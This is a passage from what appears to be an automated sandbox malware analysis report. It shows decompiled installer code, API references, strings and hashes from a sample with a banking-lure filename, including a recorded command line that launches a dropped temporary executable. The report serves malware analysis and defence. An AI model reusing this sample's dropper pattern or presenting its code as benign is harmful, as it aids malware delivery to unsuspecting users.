							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00405038
0x00405051
0x00405056
0x0040505e
0x00405064
0x0040507a
0x0040507d
0x004052a8
0x004052af
0x004052c3
0x004052b1
0x004052b3
0x004052b6
0x004052b7
0x004052be
0x004052be
0x004052cf
0x004052dd
0x004052e0
0x004052f6
0x0040536b
0x0040536e
0x00405370
0x0040537a
0x00405388
0x00405388
0x0040538a
0x00405394
0x0040539a
0x0040539d
0x004053a0
0x004053bb
0x004053a2
0x004053ac
0x004053ac
0x004053a0
0x00405394
0x00000000
0x0040536e
0x004052fb
0x00405306
0x0040530b
0x00405312
0x00405317
0x0040531b
0x00405326
0x00405326
0x0040532a
0x0040532e
0x00405332
0x00405345
0x00405334
0x00405334
0x0040533b
0x00405341
0x0040533d
0x0040533d
0x0040533d
0x0040533b
0x00405349
0x0040534b
0x0040535e
0x00405361
0x00405364
0x00405364
0x0040532e
0x00000000
0x0040531b
0x004052fd
0x00405304
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053be
0x004053be
0x004053c5
0x00405436
0x0040543e
0x00405446
0x00405446
0x0040544f
0x00405451
0x00405458
0x0040545b
0x0040545b
0x00405461
0x00405468
0x0040546b
0x0040546b
0x00405471
0x00405477
0x0040547d
0x0040547d
0x0040548a
0x004055eb
0x004055f2
0x0040560f
0x00405615
0x00405627
0x00405627
0x00000000
0x00405490
0x00405492
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a3
0x004054a4
0x004054a5
0x004054a7
0x004054a7
0x004054af
0x004054f0
0x004054f2
0x00405502
0x00405505
0x0040550a
0x00405511
0x00405514
0x004055b6
0x004055bf
0x004055c7
0x004055c7
0x004055d5
0x004055e6
0x004055e6
0x00000000
0x004055d5
0x0040551a
0x0040551d
0x00405523
0x00405528
0x0040552a
0x0040552c
0x00405532
0x00405539
0x0040553e
0x00405545
0x00405548
0x00405548
0x0040554f
0x0040555b
0x0040555f
0x00405561
0x00405561
0x00405551
0x00405553
0x00405553
0x00405581
0x0040558d
0x0040559c
0x0040559c
0x0040559e
0x004055a1
0x004055aa
0x00000000
0x004054b1
0x004054bc
0x004054bf
0x004054c4
0x004054c6
0x004054ca
0x004054da
0x004054e4
0x004054e6
0x004054e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004054cc
0x004054cc
0x004054d2
0x004054d4
0x004054d4
0x004054d5
0x004054d6
0x00000000
0x004054cc
0x004054af
0x0040548a
0x004053cd
0x00000000
0x004053e3
0x004053ed
0x004053f2
0x00000000
0x00000000
0x00405404
0x00405409
0x00405415
0x00405415
0x00405417
0x00405426
0x00405428
0x0040542c
0x0040542f
0x00000000
0x0040542f
0x004053cd
0x00405083
0x00405088
0x00405091
0x00405098
0x004050aa
0x004050b5
0x004050bb
0x004050c9
0x004050dd
0x004050e2
0x004050ef
0x004050f4
0x0040510a
0x0040511b
0x00405128
0x00405128
0x0040512b
0x00405131
0x00405133
0x00405136
0x0040513b
0x00405140
0x00405142
0x00405142
0x00405162
0x00405162
0x00405164
0x00405165
0x0040516a
0x00405170
0x00405174
0x00405179
0x00405181
0x00405185
0x0040518a
0x0040518f
0x00405197
0x0040519a
0x0040526a
0x0040527d
0x00000000
0x004051a0
0x004051a3
0x004051a6
0x004051a9
0x004051a9
0x004051af
0x004051b8
0x004051bb
0x004051bf
0x004051c2
0x004051c5
0x004051ce
0x004051d7
0x004051da
0x004051dd
0x004051e0
0x0040521e
0x00405249
0x00405220
0x0040522f
0x0040522f
0x004051e2
0x004051e5
0x004051f3
0x004051fd
0x00405205
0x0040520c
0x00405217
0x00405217
0x004051e0
0x0040524f
0x00405250
0x0040525c
0x0040525c
0x00405268
0x00405283
0x00405286
0x004052a3
0x00000000
0x00405288
0x0040528d
0x00405296
0x00405629
0x0040563b
0x0040563b
0x00405286
0x00000000
0x00405268
0x0040519a

APIs

GetDlgItem.USER32 ref: 00405049
GetDlgItem.USER32 ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32 ref: 004050B5
SetWindowLongW.USER32 ref: 004050CE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32 ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32 ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32 ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

M, xrefs: 004051E5
, xrefs: 004055FF
N, xrefs: 004052C6

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}

0x00404795
0x004048c2
0x0040491f
0x00404923
0x004049f0
0x004049f2
0x004049f2
0x004049f8
0x004049f8
0x004049fb
0x00000000
0x00404a02
0x00404931
0x00404937
0x00404941
0x0040494c
0x0040494f
0x00404952
0x0040495d
0x00404960
0x00404967
0x00404974
0x00404985
0x0040498b
0x00404993
0x004049a1
0x004049a7
0x004049a7
0x00404967
0x004049b1
0x00000000
0x004049bc
0x004049c0
0x004049d0
0x004049d0
0x004049d6
0x004049e2
0x004049e2
0x00000000
0x004049e6
0x004049b1
0x004048cd
0x00000000
0x004048df
0x004048e4
0x004048ea
0x00000000
0x00000000
0x00404913
0x00404915
0x0040491a
0x00000000
0x0040491a
0x004048cd
0x0040479b
0x0040479e
0x004047a3
0x004047b4
0x004047b4
0x004047bc
0x004047bf
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047da
0x004047dc
0x004047dc
0x004047e6
0x004047f3
0x004047fd
0x00404802
0x00404805
0x0040480a
0x00404821
0x00404828
0x0040483b
0x0040483e
0x00404852
0x00404859
0x0040485e
0x00404863
0x00404863
0x00404871
0x0040487f
0x00404891
0x00404896
0x004048a6
0x004048a8
0x00000000

APIs

CheckDlgButton.USER32 ref: 00404821
GetDlgItem.USER32 ref: 00404835
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
GetSysColor.USER32(?), ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32 ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32 ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32(00000000,00007F02), ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2

Strings

"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v, xrefs: 00404960
N, xrefs: 0040491F

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$N
API String ID: 3103080414-1326665678
Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062ae
0x004062b7
0x004062be
0x004062c8
0x004062dc
0x00406304
0x0040630b
0x0040630f
0x00406313
0x00406333
0x0040633a
0x00406344
0x00406351
0x00406356
0x0040635b
0x0040635f
0x0040636e
0x00406370
0x0040637d
0x00406381
0x0040641c
0x00000000
0x00406397
0x004063a4
0x004063c8
0x004063cc
0x004063eb
0x004063ef
0x004063ef
0x004063f1
0x004063fa
0x00406405
0x00406410
0x00406416
0x00000000
0x00406416
0x004063ce
0x004063d1
0x004063dc
0x004063d8
0x004063da
0x004063db
0x004063db
0x004063e3
0x004063e5
0x00000000
0x004063e5
0x004063af
0x004063b5
0x00000000
0x004063b5
0x00406381
0x0040635f
0x004062de
0x004062e9
0x004062f2
0x004062f6
0x00000000
0x00000000
0x004062f6
0x00406427

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
GetShortPathNameW.KERNEL32 ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32 ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32 ref: 00406416
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Strings

%ls=%ls, xrefs: 00406323
uB, xrefs: 00406304
uB, xrefs: 0040630B
mB, xrefs: 004062D7
[Rename], xrefs: 00406397, 004063A9

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

